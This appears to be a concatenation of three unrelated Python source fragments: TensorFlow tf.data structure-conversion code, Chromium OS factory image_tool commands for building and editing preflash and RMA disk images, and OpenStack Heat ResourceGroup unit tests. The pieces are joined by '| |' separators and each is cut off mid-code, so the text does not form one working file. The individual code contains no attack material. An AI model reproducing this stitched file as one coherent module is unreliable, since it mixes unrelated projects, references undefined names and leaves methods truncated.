def _to_legacy_output_types(self):
raise NotImplementedError("Structure._to_legacy_output_types()")
@abc.abstractmethod
def _to_legacy_output_shapes(self):
raise NotImplementedError("Structure._to_legacy_output_shapes()")
@abc.abstractmethod
def _to_legacy_output_classes(self):
raise NotImplementedError("Structure._to_legacy_output_classes()")
def normalize_tensors(tensors):
"""Converts a nested structure of tensor-like objects to tensors.
* `SparseTensor`-like inputs are converted to `SparseTensor`.
* `TensorArray` inputs are passed through.
* Everything else is converted to a dense `Tensor`.
Args:
tensors: A nested structure of tensor-like, list,
`SparseTensor`, `SparseTensorValue`, or `TensorArray` objects.
Returns:
A nested structure of tensor, `SparseTensor`, or `TensorArray` objects.
"""
flat_tensors = nest.flatten(tensors)
prepared = []
with ops.name_scope("normalize_tensors"):
for i, t in enumerate(flat_tensors):
if sparse_tensor_lib.is_sparse(t):
prepared.append(sparse_tensor_lib.SparseTensor.from_value(t))
elif isinstance(t, tensor_array_ops.TensorArray):
prepared.append(t)
else:
prepared.append(ops.convert_to_tensor(t, name="component_%d" % i))
return nest.pack_sequence_as(tensors, prepared)
def convert_legacy_structure(output_types, output_shapes, output_classes):
"""Returns a `Structure` that represents the given legacy structure.
This method provides a way to convert from the existing `Dataset` and
`Iterator` structure-related properties to a `Structure` object. A "legacy"
structure is represented by the `tf.data.Dataset.output_types`,
`tf.data.Dataset.output_shapes`, and `tf.data.Dataset.output_classes`
properties.
TODO(b/110122868): Remove this function once `Structure` is used throughout
`tf.data`.
Args:
output_types: A nested structure of `tf.DType` objects corresponding to
each component of a structured value.
output_shapes: A nested structure of `tf.TensorShape` objects
corresponding to each component a structured value.
output_classes: A nested structure of Python `type` objects corresponding
to each component of a structured value.
Returns:
A `Structure`.
Raises:
TypeError: If a structure cannot be built from the arguments, because one of
the component classes in `output_classes` is not supported.
"""
flat_types = nest.flatten(output_types)
flat_shapes = nest.flatten(output_shapes)
flat_classes = nest.flatten(output_classes)
flat_ret = []
for flat_type, flat_shape, flat_class in zip(flat_types, flat_shapes,
flat_classes):
if isinstance(flat_class, Structure):
flat_ret.append(flat_class)
elif issubclass(flat_class, sparse_tensor_lib.SparseTensor):
flat_ret.append(SparseTensorStructure(flat_type, flat_shape))
elif issubclass(flat_class, ops.Tensor):
flat_ret.append(TensorStructure(flat_type, flat_shape))
elif issubclass(flat_class, tensor_array_ops.TensorArray):
# We sneaked the dynamic_size and infer_shape into the legacy shape.
flat_ret.append(
TensorArrayStructure(
flat_type, flat_shape[2:],
dynamic_size=tensor_shape.dimension_value(flat_shape[0]),
infer_shape=tensor_shape.dimension_value(flat_shape[1])))
else:
# NOTE(mrry): Since legacy structures produced by iterators only
# comprise Tensors, SparseTensors, and nests, we do not need to
# support all structure types here.
raise TypeError(
"Could not build a structure for output class %r" % (flat_class,))
ret = nest.pack_sequence_as(output_classes, flat_ret)
if isinstance(ret, Structure):
return ret
else:
return NestedStructure(ret)
# NOTE(mrry): The following classes make extensive use of non-public methods of
# their base class, so we disable the protected-access lint warning once here.
# pylint: disable=protected-access
class NestedStructure(Structure):
"""Represents a nested structure in which each leaf is a `Structure`."""
def __init__(self, nested_structure):
self._nested_structure = nested_structure
self._flat_shapes_list = []
self._flat_types_list = []
for s in nest.flatten(nested_structure):
if not isinstance(s, Structure):
raise TypeError("nested_structure must be a (potentially nested) tuple "
"or dictionary of Structure objects.")
self._flat_shapes_list.extend(s._flat_shapes)
self._flat_types_list.extend(s._flat_types)
@property
def _flat_shapes(self):
return self._flat_shapes_list
@property
def _flat_types(self):
return self._flat_types_list
def is_compatible_with(self, other):
if not isinstance(other, NestedStructure):
return False
try:
# pylint: disable=protected-access
nest.assert_same_structure(self._nested_structure,
other._nested_structure)
except (ValueError, TypeError):
return False
return all(
substructure.is_compatible_with(other_substructure)
for substructure, other_substructure in zip(
nest.flatten(self._nested_structure),
nest.flatten(other._nested_structure)))
| |
% (
part, PATH_CROS_FIRMWARE_UPDATER, output))
class NetbootFirmwareSettingsCommand(SubCommand):
"""Access Chrome OS netboot firmware (image.net.bin) settings."""
name = 'netboot'
aliases = ['netboot_firmware_settings']
def Init(self):
netboot_firmware_settings.DefineCommandLineArgs(self.subparser)
def Run(self):
netboot_firmware_settings.NetbootFirmwareSettings(self.args)
class GPTCommand(SubCommand):
"""Access GPT (GUID Partition Table) with `cgpt` style commands."""
name = 'gpt'
aliases = ['pygpt', 'cgpt']
gpt = None
def Init(self):
self.gpt = pygpt.GPTCommands()
self.gpt.DefineArgs(self.subparser)
def Run(self):
self.gpt.Execute(self.args)
class ResizeFileSystemCommand(SubCommand):
"""Changes file system size from a partition on a Chromium OS disk image."""
name = 'resize'
aliases = ['resize_image_fs']
def Init(self):
self.subparser.add_argument(
'-i', '--image', type=ArgTypes.ExistsPath, required=True,
help='path to the Chromium OS disk image')
self.subparser.add_argument(
'-p', '--partition_number', type=int, default=1,
help='file system on which partition to resize')
self.subparser.add_argument(
'-s', '--size_mb', type=int, default=1024,
help='file system size to change (set or add, see --append) in MB')
self.subparser.add_argument(
'-a', '--append', dest='append', action='store_true', default=True,
help='append (increase) file system by +size_mb')
self.subparser.add_argument(
'--no-append', dest='append', action='store_false',
help='set file system to a new size of size_mb')
def Run(self):
part = Partition(self.args.image, self.args.partition_number)
curr_size = part.GetFileSystemSize()
if self.args.append:
new_size = curr_size + self.args.size_mb * MEGABYTE
else:
new_size = self.args.size_mb * MEGABYTE
if new_size > part.size:
raise RuntimeError(
'Requested size (%s MB) larger than %s partition (%s MB).' % (
new_size // MEGABYTE, part, part.size // MEGABYTE))
new_size = part.ResizeFileSystem(new_size)
print('OK: %s file system has been resized from %s to %s MB.' %
(part, curr_size // MEGABYTE, new_size // MEGABYTE))
class CreatePreflashImageCommand(SubCommand):
"""Create a disk image for factory to pre-flash into internal storage.
The output contains factory toolkit, release and test images.
The manufacturing line can directly dump this image to device boot media
(eMMC, SSD, NVMe, ... etc) using 'dd' command or copy machines.
"""
name = 'preflash'
def Init(self):
ChromeOSFactoryBundle.DefineBundleArguments(
self.subparser, ChromeOSFactoryBundle.PREFLASH)
self.subparser.add_argument(
'--sectors', type=int, default=31277232,
help=('size of image in sectors (see --sector-size). '
'default: %(default)s'))
self.subparser.add_argument(
'--sector-size', type=int, default=DEFAULT_BLOCK_SIZE,
help='size of each sector. default: %(default)s')
self.subparser.add_argument(
'--stateful_free_space', type=int, default=1024,
help=('extra space to claim in stateful partition in MB. '
'default: %(default)s'))
self.subparser.add_argument(
'-o', '--output', required=True,
help='path to the output disk image file.')
def Run(self):
with SysUtils.TempDirectory(prefix='diskimg_') as temp_dir:
bundle = ChromeOSFactoryBundle(
temp_dir=temp_dir,
board=PREFLASH_DEFAULT_BOARD,
release_image=self.args.release_image,
test_image=self.args.test_image,
toolkit=self.args.toolkit,
factory_shim=None,
enable_firmware=False,
hwid=self.args.hwid,
complete=None,
project_config=self.args.project_config,
project=self.args.project,
designs=self.args.designs,
)
if self.args.verify_cros_config:
bundle.VerifyCrosConfig()
new_size = bundle.CreateDiskImage(
self.args.output, self.args.sectors, self.args.sector_size,
self.args.stateful_free_space, self.args.verbose)
print('OK: Generated pre-flash disk image at %s [%s G]' % (
self.args.output, new_size // GIGABYTE_STORAGE))
class ShowPreflashImageCommand(SubCommand):
"""Show the content of a disk image."""
name = 'preflash-show'
def Init(self):
self.subparser.add_argument(
'-i', '--image', required=True,
type=ArgTypes.ExistsPath,
help='Path to input preflash image.')
def Run(self):
ChromeOSFactoryBundle.ShowDiskImage(self.args.image)
class CreateRMAImageCommmand(SubCommand):
"""Create an RMA image for factory to boot from USB and repair device.
The output is a special factory install shim (factory_install) with all
resources (release, test images and toolkit). The manufacturing line or RMA
centers can boot it from USB and install all factory software bits into
a device.
"""
namespace = CMD_NAMESPACE_RMA
name = 'create'
aliases = ['create_rma', 'rma-create']
def Init(self):
ChromeOSFactoryBundle.DefineBundleArguments(
self.subparser, ChromeOSFactoryBundle.RMA)
self.subparser.add_argument(
'--active_test_list', default=None,
help='active test list')
self.subparser.add_argument(
'-f', '--force', action='store_true',
help='Overwrite existing output image file.')
self.subparser.add_argument(
'-o', '--output', required=True,
help='path to the output RMA image file')
def Run(self):
output = self.args.output
if os.path.exists(output) and not self.args.force:
raise RuntimeError(
'Output already exists (add -f to overwrite): %s' % output)
with SysUtils.TempDirectory(prefix='rma_') as temp_dir:
bundle = ChromeOSFactoryBundle(
temp_dir=temp_dir,
board=self.args.board,
release_image=self.args.release_image,
test_image=self.args.test_image,
toolkit=self.args.toolkit,
factory_shim=self.args.factory_shim,
enable_firmware=self.args.enable_firmware,
firmware=self.args.firmware,
hwid=self.args.hwid,
complete=self.args.complete,
toolkit_config=self.args.toolkit_config,
description=self.args.description,
project_config=self.args.project_config,
project=self.args.project,
designs=self.args.designs,
)
if self.args.verify_cros_config:
bundle.VerifyCrosConfig()
bundle.CreateRMAImage(self.args.output,
active_test_list=self.args.active_test_list)
ChromeOSFactoryBundle.ShowRMAImage(output)
print('OK: Generated %s RMA image at %s' %
(bundle.board, self.args.output))
class MergeRMAImageCommand(SubCommand):
"""Merge multiple RMA images into one single large image."""
namespace = CMD_NAMESPACE_RMA
name = 'merge'
aliases = ['merge_rma', 'rma-merge']
def Init(self):
self.subparser.add_argument(
'-f', '--force', action='store_true',
help='Overwrite existing output image file.')
self.subparser.add_argument(
'-o', '--output', required=True,
help='Path to the merged output image.')
self.subparser.add_argument(
'-i', '--images', required=True, nargs='+',
type=ArgTypes.ExistsPath,
help='Path to input RMA images')
self.subparser.add_argument(
'-a', '--auto_select', action='store_true',
help='Automatically resolve duplicate boards (use the last one).')
def Run(self):
"""Merge multiple RMA (USB installation) disk images.
The RMA images should be created by 'image_tool rma' command, with different
board names.
"""
output = self.args.output
if os.path.exists(output) and not self.args.force:
raise RuntimeError(
'Output already exists (add -f to overwrite): %s' % output)
if len(self.args.images) < 2:
raise RuntimeError('Need > 1 input image files to merge.')
print('Scanning %s input image files...' % len(self.args.images))
ChromeOSFactoryBundle.MergeRMAImage(
self.args.output, self.args.images, self.args.auto_select)
ChromeOSFactoryBundle.ShowRMAImage(output)
print('OK: Merged successfully in new image: %s' % output)
class ExtractRMAImageCommand(SubCommand):
"""Extract an RMA image from a universal RMA image."""
namespace = CMD_NAMESPACE_RMA
name = 'extract'
aliases = ['extract_rma', 'rma-extract']
def Init(self):
self.subparser.add_argument(
'-f', '--force', action='store_true',
help='Overwrite existing output image file.')
self.subparser.add_argument(
'-o', '--output', required=True,
help='Path to the merged output image.')
self.subparser.add_argument(
'-i', '--image', required=True,
type=ArgTypes.ExistsPath,
help='Path to input RMA image.')
self.subparser.add_argument(
'-s', '--select', default=None,
help='Select the SELECT-th board in the shim to extract.')
def Run(self):
"""Extract RMA (USB installation) disk image from a universal RMA image.
The RMA image should be created by 'image_tool rma create' or
'image_tool rma merge' command.
"""
output = self.args.output
if os.path.exists(output) and not self.args.force:
raise RuntimeError(
'Output already exists (add -f to overwrite): %s' % output)
print('Scanning input image file...')
ChromeOSFactoryBundle.ExtractRMAImage(
self.args.output, self.args.image, self.args.select)
ChromeOSFactoryBundle.ShowRMAImage(output)
print('OK: Extracted successfully in new image: %s' % output)
class ShowRMAImageCommand(SubCommand):
"""Show the content of a RMA image."""
namespace = CMD_NAMESPACE_RMA
name = 'show'
aliases = ['show_rma', 'rma-show']
def Init(self):
self.subparser.add_argument(
'-i', '--image', required=True,
type=ArgTypes.ExistsPath,
help='Path to input RMA image.')
def Run(self):
ChromeOSFactoryBundle.ShowRMAImage(self.args.image)
class ReplaceRMAComponentCommand(SubCommand):
"""Replace components in an RMA shim."""
namespace = CMD_NAMESPACE_RMA
name = 'replace'
aliases = ['replace_rma', 'rma-replace']
def Init(self):
ChromeOSFactoryBundle.DefineBundleArguments(
self.subparser, ChromeOSFactoryBundle.REPLACEABLE)
self.subparser.add_argument(
'-i', '--image', required=True,
type=ArgTypes.ExistsPath,
help='Path to input RMA image.')
self.subparser.add_argument(
'--firmware_from_release', action='store_true',
help='Replace firmware with the one in the provided release image.')
def Run(self):
with SysUtils.TempDirectory(prefix='rma_') as temp_dir:
# Get firmware from release_image.
if self.args.release_image and self.args.firmware_from_release:
part = Partition(self.args.release_image, PART_CROS_ROOTFS_A)
self.args.firmware = part.CopyFile(
PATH_CROS_FIRMWARE_UPDATER, temp_dir, fs_type=FS_TYPE_CROS_ROOTFS)
# Replacing factory shim is different from replacing other payloads.
# Other payloads are stored as compressed files in stateful partition. We
# only need to replace files and adjust the size of stateful partition,
# which is easy because stateful partition is the last partition.
# Replacing factory shim actually replaces kernel and rootfs partition.
# These partitions are not the last partition and we cannot easily change
# their sizes, so we can only use the factory shim to create a new RMA
# shim and overwrite the original image.
single_board_image = None
if self.args.factory_shim:
if self.args.board is None:
self.args.board = _GetBoardName(self.args.image)
logging.warning('Replacing factory shim for board %s. '
'lsb-factory configs will be cleared.', self.args.board)
single_board_image = os.path.join(temp_dir, 'single_board.bin')
bundle = ChromeOSFactoryBundle(
temp_dir=temp_dir,
board=self.args.board,
release_image=None,
test_image=None,
toolkit=None,
factory_shim=self.args.factory_shim)
with Partition(self.args.image, PART_CROS_STATEFUL).Mount() as stateful:
DIR_CROS_PAYLOADS = CrosPayloadUtils.GetCrosPayloadsDir()
src_payloads_dir = os.path.join(stateful, DIR_CROS_PAYLOADS)
bundle.CreateRMAImage(
single_board_image, src_payloads_dir=src_payloads_dir)
# Also get RMA metadata here.
rma_metadata = _ReadRMAMetadata(stateful)
target_image = (
single_board_image if single_board_image else self.args.image)
ChromeOSFactoryBundle.ReplaceRMAPayload(
target_image,
board=self.args.board,
release_image=self.args.release_image,
test_image=self.args.test_image,
toolkit=self.args.toolkit,
firmware=self.args.firmware,
hwid=self.args.hwid,
complete=self.args.complete,
toolkit_config=self.args.toolkit_config,
project_config=self.args.project_config)
if self.args.factory_shim:
if len(rma_metadata) > 1:
# If the original shim is a multi-board shim, we need to replace the
# board in the multi-board shim with the new single-board shim.
multi_board_image = os.path.join(temp_dir, 'multi_board.bin')
ChromeOSFactoryBundle.MergeRMAImage(
multi_board_image, [self.args.image, single_board_image],
auto_select=True)
Shell(['mv', multi_board_image, self.args.image])
else:
Shell(['mv', single_board_image, self.args.image])
ChromeOSFactoryBundle.ShowRMAImage(self.args.image)
print('OK: Replaced components successfully in image: %s' % self.args.image)
class ToolkitCommand(SubCommand):
"""Unpack/repack the factory toolkit in an RMA shim."""
namespace = CMD_NAMESPACE_PAYLOAD
name = 'toolkit'
def Init(self):
self.subparser.add_argument(
'-i', '--image', required=True,
type=ArgTypes.ExistsPath,
help='Path to input RMA image.')
self.subparser.add_argument(
'--board', type=str, default=None,
help='Board to get toolkit.')
self.subparser.add_argument(
'--unpack', type=str, default=None,
help='Path to unpack the toolkit.')
self.subparser.add_argument(
'--repack', type=str, default=None,
help='Path to repack the toolkit.')
def Run(self):
# Check that exactly one of --unpack and --repack is specified.
# When unpacking, check that the unpack directory doesn't exist yet.
# When repacking, check that the repack directory exists.
if not bool(self.args.unpack) ^ bool(self.args.repack):
raise RuntimeError('Please specify exactly one of --unpack and --repack.')
target_path = self.args.unpack or self.args.repack
if self.args.unpack:
if os.path.exists(target_path):
raise RuntimeError('Extract path "%s" already exists.' % target_path)
if self.args.repack:
if not os.path.isdir(target_path):
raise RuntimeError('PATH should be a directory.')
| |
= "Bar___foo__"
res_def['properties']['listprop'] = ["__foo___0",
"__foo___1",
"__foo___2"]
res_def['type'] = "ResourceWithListProp__foo__"
snip = snip.freeze(properties=props)
resg = resource_group.ResourceGroup('test', snip, stack)
expect = {
"heat_template_version": "2015-04-30",
"resources": {
"0": {
"type": "ResourceWithListProp__foo__",
"properties": {
"Foo": "Bar_0",
"listprop": [
"0_0", "0_1", "0_2"
]
}
}
},
"outputs": {
"refs_map": {
"value": {
"0": {"get_resource": "0"},
}
}
}
}
nested = resg._assemble_nested(['0']).t
res_prop = nested['resources']['0']['properties']
res_prop['listprop'] = list(res_prop['listprop'])
self.assertEqual(expect, nested)
def test_assemble_no_properties(self):
templ = copy.deepcopy(template)
res_def = templ["resources"]["group1"]["properties"]['resource_def']
del res_def['properties']
stack = utils.parse_stack(templ)
resg = stack.resources['group1']
self.assertIsNone(resg.validate())
def test_validate_with_blacklist(self):
templ = copy.deepcopy(template_server)
self.mock_flavor = mock.Mock(ram=4, disk=4)
self.mock_active_image = mock.Mock(min_ram=1, min_disk=1,
status='active')
self.mock_inactive_image = mock.Mock(min_ram=1, min_disk=1,
status='inactive')
def get_image(image_identifier):
if image_identifier == 'image0':
return self.mock_inactive_image
else:
return self.mock_active_image
self.patchobject(glance.GlanceClientPlugin, 'get_image',
side_effect=get_image)
self.patchobject(nova.NovaClientPlugin, 'get_flavor',
return_value=self.mock_flavor)
props = templ["resources"]["group1"]["properties"]
props["removal_policies"] = [{"resource_list": ["0"]}]
stack = utils.parse_stack(templ)
resg = stack.resources['group1']
self.assertIsNone(resg.validate())
def test_invalid_res_type(self):
"""Test that error raised for unknown resource type."""
tmp = copy.deepcopy(template)
grp_props = tmp['resources']['group1']['properties']
grp_props['resource_def']['type'] = "idontexist"
stack = utils.parse_stack(tmp)
snip = stack.t.resource_definitions(stack)['group1']
resg = resource_group.ResourceGroup('test', snip, stack)
exc = self.assertRaises(exception.StackValidationFailed,
resg.validate)
exp_msg = 'The Resource Type (idontexist) could not be found.'
self.assertIn(exp_msg, str(exc))
def test_reference_attr(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
self.assertIsNone(resgrp.validate())
def test_validate_reference_attr_with_none_ref(self):
stack = utils.parse_stack(template_attr)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
self.patchobject(resgrp, 'referenced_attrs',
return_value=set([('nested_dict', None)]))
self.assertIsNone(resgrp.validate())
def test_invalid_removal_policies_nolist(self):
"""Test that error raised for malformed removal_policies."""
tmp = copy.deepcopy(template)
grp_props = tmp['resources']['group1']['properties']
grp_props['removal_policies'] = 'notallowed'
stack = utils.parse_stack(tmp)
snip = stack.t.resource_definitions(stack)['group1']
resg = resource_group.ResourceGroup('test', snip, stack)
exc = self.assertRaises(exception.StackValidationFailed,
resg.validate)
errstr = "removal_policies: \"'notallowed'\" is not a list"
self.assertIn(errstr, str(exc))
def test_invalid_removal_policies_nomap(self):
"""Test that error raised for malformed removal_policies."""
tmp = copy.deepcopy(template)
grp_props = tmp['resources']['group1']['properties']
grp_props['removal_policies'] = ['notallowed']
stack = utils.parse_stack(tmp)
snip = stack.t.resource_definitions(stack)['group1']
resg = resource_group.ResourceGroup('test', snip, stack)
exc = self.assertRaises(exception.StackValidationFailed,
resg.validate)
errstr = '"notallowed" is not a map'
self.assertIn(errstr, str(exc))
def test_child_template(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
def check_res_names(names):
self.assertEqual(list(names), ['0', '1'])
return 'tmpl'
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp._assemble_nested = mock.Mock()
resgrp._assemble_nested.side_effect = check_res_names
resgrp.properties.data[resgrp.COUNT] = 2
self.assertEqual('tmpl', resgrp.child_template())
self.assertEqual(1, resgrp._assemble_nested.call_count)
def test_child_params(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
self.assertEqual({}, resgrp.child_params())
def test_handle_create(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp.create_with_template = mock.Mock(return_value=None)
self.assertIsNone(resgrp.handle_create())
self.assertEqual(1, resgrp.create_with_template.call_count)
def test_handle_create_with_batching(self):
self.inspector.member_names.return_value = []
self.inspector.size.return_value = 0
stack = utils.parse_stack(tmpl_with_default_updt_policy())
defn = stack.t.resource_definitions(stack)['group1']
props = stack.t.t['resources']['group1']['properties'].copy()
props['count'] = 10
update_policy = {'batch_create': {'max_batch_size': 3}}
snip = defn.freeze(properties=props, update_policy=update_policy)
resgrp = resource_group.ResourceGroup('test', snip, stack)
self.patchobject(scheduler.TaskRunner, 'start')
checkers = resgrp.handle_create()
self.assertEqual(4, len(checkers))
def test_handle_create_with_batching_zero_count(self):
self.inspector.member_names.return_value = []
self.inspector.size.return_value = 0
stack = utils.parse_stack(tmpl_with_default_updt_policy())
defn = stack.t.resource_definitions(stack)['group1']
props = stack.t.t['resources']['group1']['properties'].copy()
props['count'] = 0
update_policy = {'batch_create': {'max_batch_size': 1}}
snip = defn.freeze(properties=props, update_policy=update_policy)
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp.create_with_template = mock.Mock(return_value=None)
self.assertIsNone(resgrp.handle_create())
self.assertEqual(1, resgrp.create_with_template.call_count)
def test_run_to_completion(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp._check_status_complete = mock.Mock(side_effect=[False, True])
resgrp.update_with_template = mock.Mock(return_value=None)
next(resgrp._run_to_completion(snip, 200))
self.assertEqual(1, resgrp.update_with_template.call_count)
def test_update_in_failed(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp.state_set('CREATE', 'FAILED')
resgrp._assemble_nested = mock.Mock(return_value='tmpl')
resgrp.properties.data[resgrp.COUNT] = 2
self.patchobject(scheduler.TaskRunner, 'start')
resgrp.handle_update(snip, mock.Mock(), {})
self.assertTrue(resgrp._assemble_nested.called)
def test_handle_delete(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp.delete_nested = mock.Mock(return_value=None)
resgrp.handle_delete()
resgrp.delete_nested.assert_called_once_with()
def test_handle_update_size(self):
stack = utils.parse_stack(template2)
snip = stack.t.resource_definitions(stack)['group1']
resgrp = resource_group.ResourceGroup('test', snip, stack)
resgrp._assemble_nested = mock.Mock(return_value=None)
resgrp.properties.data[resgrp.COUNT] = 5
self.patchobject(scheduler.TaskRunner, 'start')
resgrp.handle_update(snip, mock.Mock(), {})
self.assertTrue(resgrp._assemble_nested.called)
class ResourceGroupBlackList(common.HeatTestCase):
"""This class tests ResourceGroup._name_blacklist()."""
# 1) no resource_list, empty blacklist
# 2) no resource_list, existing blacklist
# 3) resource_list not in nested()
# 4) resource_list (refid) not in nested()
# 5) resource_list in nested() -> saved
# 6) resource_list (refid) in nested() -> saved
# 7) resource_list (refid) in nested(), update -> saved
# 8) resource_list, update -> saved
# 9) resource_list (refid) in nested(), grouputils fallback -> saved
# A) resource_list (refid) in nested(), update, grouputils -> saved
scenarios = [
('1', dict(data_in=None, rm_list=[],
nested_rsrcs=[], expected=[],
saved=False, fallback=False, rm_mode='append')),
('2', dict(data_in='0,1,2', rm_list=[],
nested_rsrcs=[], expected=['0', '1', '2'],
saved=False, fallback=False, rm_mode='append')),
('3', dict(data_in='1,3', rm_list=['6'],
nested_rsrcs=['0', '1', '3'],
expected=['1', '3'],
saved=False, fallback=False, rm_mode='append')),
('4', dict(data_in='0,1', rm_list=['id-7'],
nested_rsrcs=['0', '1', '3'],
expected=['0', '1'],
saved=False, fallback=False, rm_mode='append')),
('5', dict(data_in='0,1', rm_list=['3'],
nested_rsrcs=['0', '1', '3'],
expected=['0', '1', '3'],
saved=True, fallback=False, rm_mode='append')),
('6', dict(data_in='0,1', rm_list=['id-3'],
nested_rsrcs=['0', '1', '3'],
expected=['0', '1', '3'],
saved=True, fallback=False, rm_mode='append')),
('7', dict(data_in='0,1', rm_list=['id-3'],
nested_rsrcs=['0', '1', '3'],
expected=['3'],
saved=True, fallback=False, rm_mode='update')),
('8', dict(data_in='1', rm_list=[],
nested_rsrcs=['0', '1', '2'],
expected=[],
saved=True, fallback=False, rm_mode='update')),
('9', dict(data_in='0,1', rm_list=['id-3'],
nested_rsrcs=['0', '1', '3'],
expected=['0', '1', '3'],
saved=True, fallback=True, rm_mode='append')),
('A', dict(data_in='0,1', rm_list=['id-3'],
nested_rsrcs=['0', '1', '3'],
expected=['3'],
saved=True, fallback=True, rm_mode='update')),
]
def test_blacklist(self):
stack = utils.parse_stack(template)
resg = stack['group1']
if self.data_in is not None:
resg.resource_id = 'foo'
# mock properties
properties = mock.MagicMock()
p_data = {'removal_policies': [{'resource_list': self.rm_list}],
'removal_policies_mode': self.rm_mode}
properties.get.side_effect = p_data.get
# mock data get/set
resg.data = mock.Mock()
resg.data.return_value.get.return_value = self.data_in
resg.data_set = mock.Mock()
# mock nested access
mock_inspect = mock.Mock()
self.patchobject(grouputils.GroupInspector, 'from_parent_resource',
return_value=mock_inspect)
mock_inspect.member_names.return_value = self.nested_rsrcs
if not self.fallback:
refs_map = {n: 'id-%s' % n for n in self.nested_rsrcs}
resg.get_output = mock.Mock(return_value=refs_map)
else:
resg.get_output = mock.Mock(side_effect=exception.NotFound)
def stack_contains(name):
return name in self.nested_rsrcs
def by_refid(name):
rid = name.replace('id-', '')
if rid not in self.nested_rsrcs:
return None
res = mock.Mock()
res.name = rid
return res
nested = mock.MagicMock()
nested.__contains__.side_effect = stack_contains
nested.__iter__.side_effect = iter(self.nested_rsrcs)
nested.resource_by_refid.side_effect = by_refid
resg.nested = mock.Mock(return_value=nested)
resg._update_name_blacklist(properties)
if self.saved:
resg.data_set.assert_called_once_with('name_blacklist',
','.join(self.expected))
else:
resg.data_set.assert_not_called()
self.assertEqual(set(self.expected), resg._name_blacklist())
class ResourceGroupEmptyParams(common.HeatTestCase):
"""This class tests ResourceGroup.build_resource_definition()."""
scenarios = [
('non_empty', dict(value='Bar', expected={'Foo': 'Bar'},
expected_include={'Foo': 'Bar'})),
('empty_None', dict(value=None, expected={},
expected_include={'Foo': None})),
('empty_boolean', dict(value=False, expected={'Foo': False},
expected_include={'Foo': False})),
('empty_string', dict(value='', expected={'Foo': ''},
expected_include={'Foo': ''})),
('empty_number', dict(value=0, expected={'Foo': 0},
expected_include={'Foo': 0})),
('empty_json', dict(value={}, expected={'Foo': {}},
expected_include={'Foo': {}})),
('empty_list', dict(value=[], expected={'Foo': []},
expected_include={'Foo': []}))
]
def test_definition(self):
templ = copy.deepcopy(template)
res_def = templ["resources"]["group1"]["properties"]['resource_def']
res_def['properties']['Foo'] = self.value
stack = utils.parse_stack(templ)
snip = stack.t.resource_definitions(stack)['group1']
resg = resource_group.ResourceGroup('test', snip, stack)
exp1 = rsrc_defn.ResourceDefinition(
None,
"OverwrittenFnGetRefIdType",
self.expected)
exp2 = rsrc_defn.ResourceDefinition(
None,
"OverwrittenFnGetRefIdType",
self.expected_include)
rdef = resg.get_resource_def()
self.assertEqual(exp1, resg.build_resource_definition('0', rdef))
rdef = resg.get_resource_def(include_all=True)
self.assertEqual(
exp2, resg.build_resource_definition('0', rdef))
class ResourceGroupNameListTest(common.HeatTestCase):
"""This class tests ResourceGroup._resource_names()."""
# 1) no blacklist, 0 count
# 2) no blacklist, x count
# 3) blacklist (not effecting)
# 4) blacklist with pruning
scenarios = [
('1', dict(blacklist=[], count=0,
expected=[])),
('2', dict(blacklist=[], count=4,
expected=['0', '1', '2', '3'])),
('3', dict(blacklist=['5', '6'], count=3,
expected=['0', '1', '2'])),
('4', dict(blacklist=['2', '4'], count=4,
expected=['0', '1', '3', '5'])),
]
def test_names(self):
stack = utils.parse_stack(template)
resg = stack['group1']
resg.properties = mock.MagicMock()
resg.properties.get.return_value = self.count
resg._name_blacklist = mock.MagicMock(return_value=self.blacklist)
self.assertEqual(self.expected, list(resg._resource_names()))
class ResourceGroupAttrTest(common.HeatTestCase):
def test_aggregate_attribs(self):
"""Test attribute aggregation.
Test attribute aggregation and that we mimic the nested resource's
attributes.
"""
resg = self._create_dummy_stack()
expected = ['0', '1']
self.assertEqual(expected, resg.FnGetAtt('foo'))
self.assertEqual(expected, resg.FnGetAtt('Foo'))
def test_index_dotted_attribs(self):
"""Test attribute aggregation.
Test attribute aggregation and that we mimic the nested resource's
attributes.
"""
resg = self._create_dummy_stack()
self.assertEqual('0', resg.FnGetAtt('resource.0.Foo'))
self.assertEqual('1', resg.FnGetAtt('resource.1.Foo'))
def test_index_path_attribs(self):
"""Test attribute aggregation.
Test attribute aggregation and that we mimic the nested resource's
attributes.
"""
resg = self._create_dummy_stack()
self.assertEqual('0', resg.FnGetAtt('resource.0', 'Foo'))
self.assertEqual('1', resg.FnGetAtt('resource.1', 'Foo'))
def test_index_deep_path_attribs(self):
"""Test attribute aggregation.
Test attribute aggregation and that we mimic the nested resource's
attributes.
"""
resg = self._create_dummy_stack(template_attr,
expect_attrs={'0': 2, '1': 2})
self.assertEqual(2, resg.FnGetAtt('resource.0',
'nested_dict', 'dict', 'b'))
self.assertEqual(2, resg.FnGetAtt('resource.1',
'nested_dict', 'dict', 'b'))
def test_aggregate_deep_path_attribs(self):
"""Test attribute aggregation.
Test attribute aggregation and that we mimic the nested resource's
attributes.
"""
resg = self._create_dummy_stack(template_attr,
expect_attrs={'0': 3, '1': 3})
expected = [3, 3]
self.assertEqual(expected, resg.FnGetAtt('nested_dict', 'list', 2))
def test_aggregate_refs(self):
"""Test resource id aggregation."""
resg = self._create_dummy_stack()
expected = ['ID-0', 'ID-1']
self.assertEqual(expected, resg.FnGetAtt("refs"))
def test_aggregate_refs_with_index(self):
"""Test resource id aggregation with index."""
resg = self._create_dummy_stack()
expected = ['ID-0', 'ID-1']
self.assertEqual(expected[0], resg.FnGetAtt("refs", 0))
self.assertEqual(expected[1], resg.FnGetAtt("refs", 1))
